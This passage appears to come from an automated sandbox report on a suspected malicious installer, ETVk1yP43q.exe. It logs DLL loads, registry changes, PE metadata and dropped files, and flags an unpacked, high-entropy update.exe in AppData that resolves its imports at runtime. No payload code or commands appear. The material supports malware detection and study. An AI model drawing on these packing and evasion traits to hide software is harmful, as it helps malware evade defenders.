                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: mmdevapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: devobj.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: wpdshext.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: portabledeviceapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeSection loaded: msasn1.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: ehstorshell.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: ehstorapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: thumbcache.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: policymanager.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: msvcp110_win.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: mrmcorer.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: iertutil.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: edputil.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: urlmon.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: srvcli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: wintypes.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: appresolver.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: bcp47langs.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: slc.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: sppc.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: textshaping.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: napinsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: pnrpnsp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: wshbth.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: nlaapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: winrnr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: winhttp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: winnsi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: profapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: taskschd.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: xmllite.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: taskschd.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: xmllite.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wkscli.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: cscapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wtsapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: winsta.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: propsys.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: wldp.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe Section loaded: olepro32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: version.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: mpr.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: shfolder.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: netapi32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: wininet.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: wsock32.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe Section loaded: wkscli.dll
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32
                    Source: Chameleon Explorer.lnk.2.dr LNK file: ..\..\..\..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: Chameleon Explorer.lnk0.2.dr LNK file: ..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Window found: window name: TMainForm
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: ETVk1yP43q.exe Static file information: File size 8302080 > 1048576
                    Source: ETVk1yP43q.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x720800
                    Source: ETVk1yP43q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: ETVk1yP43q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: ETVk1yP43q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: ETVk1yP43q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: ETVk1yP43q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: ETVk1yP43q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: ETVk1yP43q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\* source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbJ source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C: (x8C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb\*V@E source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\dll\ntdll.pdbX source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb( source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbP source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dows\SYSTEM32\ntdll.pdbT source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdbp source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb` source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\DLL\kernel32.pdbk source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\ntdll.pdb* source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1893969183.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\kernel32.pdb\*Y source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\SYSTEM32\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014D4000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014D7000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\dll\ntdll.pdb source: ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014AE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Program Files (x86)\Chameleon Explorer\symbols\DLL\kernel32.pdb1 source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892792401.00000000014CA000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: leonExplorerntdll.pdb\SYSTEM32\ntdll.pdbon Explorer\symbols\dll\ntdll.pdbdb source: ChameleonExplorer.exe, 0000000A.00000002.1913050839.0000000001495000.00000004.00000020.00020000.00000000.sdmp
                    Source: ETVk1yP43q.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: ETVk1yP43q.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: ETVk1yP43q.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: ETVk1yP43q.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: ETVk1yP43q.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Roaming\update.exe Unpacked PE file: 21.2.update.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
                    Source: C:\Users\user\AppData\Roaming\update.exe Code function: 21_2_00417236 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 21_2_00417236
                    Source: is-SCGGO.tmp.2.dr Static PE information: section name: .didata
                    Source: is-F1F8N.tmp.2.dr Static PE information: section name: .didata
                    Source: is-JAVSO.tmp.2.dr Static PE information: section name: .didata
                    Source: is-32DE6.tmp.2.dr Static PE information: section name: .didata
                    Source: is-GJT7J.tmp.2.dr Static PE information: section name: .didata
                    Source: is-KSQ9G.tmp.2.dr Static PE information: section name: .didata
                    Source: is-KSQ9G.tmp.2.dr Static PE information: section name: JCLDEBUG
                    Source: is-29AV0.tmp.2.dr Static PE information: section name: .didata
                    Source: is-29AV0.tmp.2.dr Static PE information: section name: JCLDEBUG
                    Source: Folder.dll.9.dr Static PE information: section name: .didata
                    Source: Folder64.dll_backup.9.dr Static PE information: section name: .didata
                    Source: Folder64.dll.9.dr Static PE information: section name: .didata
                    Source: Folder.dll_backup.9.dr Static PE information: section name: .didata
                    Source: ExplorerHelper32.dll_backup.10.dr Static PE information: section name: .didata
                    Source: ExplorerHelper32.dll.10.dr Static PE information: section name: .didata
                    Source: ExplorerHelper64.dll.11.dr Static PE information: section name: .didata
                    Source: ExplorerHelper64.dll_backup.11.dr Static PE information: section name: .didata
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035F0434 push 035F04D1h; ret 2_2_035F04C9
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A033C push ecx; mov dword ptr [esp], edx 2_2_035A033D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A032C push ecx; mov dword ptr [esp], edx 2_2_035A032D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_0359F3E0 push ecx; mov dword ptr [esp], eax 2_2_0359F3E2
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035D23E4 push ecx; mov dword ptr [esp], edx 2_2_035D23E6
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_0359C3B0 push ecx; mov dword ptr [esp], edx 2_2_0359C3B1
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A23AC push ecx; mov dword ptr [esp], edx 2_2_035A23AD
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DA2B0 push ecx; mov dword ptr [esp], edx 2_2_035DA2B1
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035D9154 push 035D9233h; ret 2_2_035D922B
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DE150 push ecx; mov dword ptr [esp], edx 2_2_035DE151
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A11DC push ecx; mov dword ptr [esp], edx 2_2_035A11DD
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A2010 push ecx; mov dword ptr [esp], edx 2_2_035A2011
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_0359C028 push 0359C07Eh; ret 2_2_0359C076
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DD0F4 push ecx; mov dword ptr [esp], edx 2_2_035DD0F5
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DB75C push ecx; mov dword ptr [esp], edx 2_2_035DB75D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DD70C push ecx; mov dword ptr [esp], edx 2_2_035DD70D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DC724 push ecx; mov dword ptr [esp], edx 2_2_035DC725
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A0794 push ecx; mov dword ptr [esp], edx 2_2_035A0795
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_0359F7A8 push ecx; mov dword ptr [esp], edx 2_2_0359F7A9
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A07A4 push ecx; mov dword ptr [esp], edx 2_2_035A07A5
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035B061C push 035B067Eh; ret 2_2_035B0676
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035F06F4 push 035F0790h; ret 2_2_035F0788
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DD518 push ecx; mov dword ptr [esp], edx 2_2_035DD519
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A152C push ecx; mov dword ptr [esp], edx 2_2_035A152D
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035F05E4 push 035F062Eh; ret 2_2_035F0626
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035A0420 push ecx; mov dword ptr [esp], ecx 2_2_035A0424
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035F04F8 push 035F05AEh; ret 2_2_035F05A6
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DE4EC push ecx; mov dword ptr [esp], edx 2_2_035DE4ED
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_03561B48 push 03561B80h; ret 2_2_03561B78
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DEB70 push ecx; mov dword ptr [esp], edx 2_2_035DEB71
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp Code function: 2_2_035DDB30 push ecx; mov dword ptr [esp], edx 2_2_035DDB31
                    Source: update.exe.0.dr Static PE information: section name: .text entropy: 7.39308779225367
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-JAVSO.tmp
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe File created: C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup
                    Source: C:\Users\user\Desktop\ETVk1yP43q.exe File created: C:\Users\user\AppData\Local\Temp\aut5826.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Users\user\AppData\Local\Temp\is-N60P6.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-29AV0.tmp
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-OJNBS.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\is-32DE6.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp File created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)
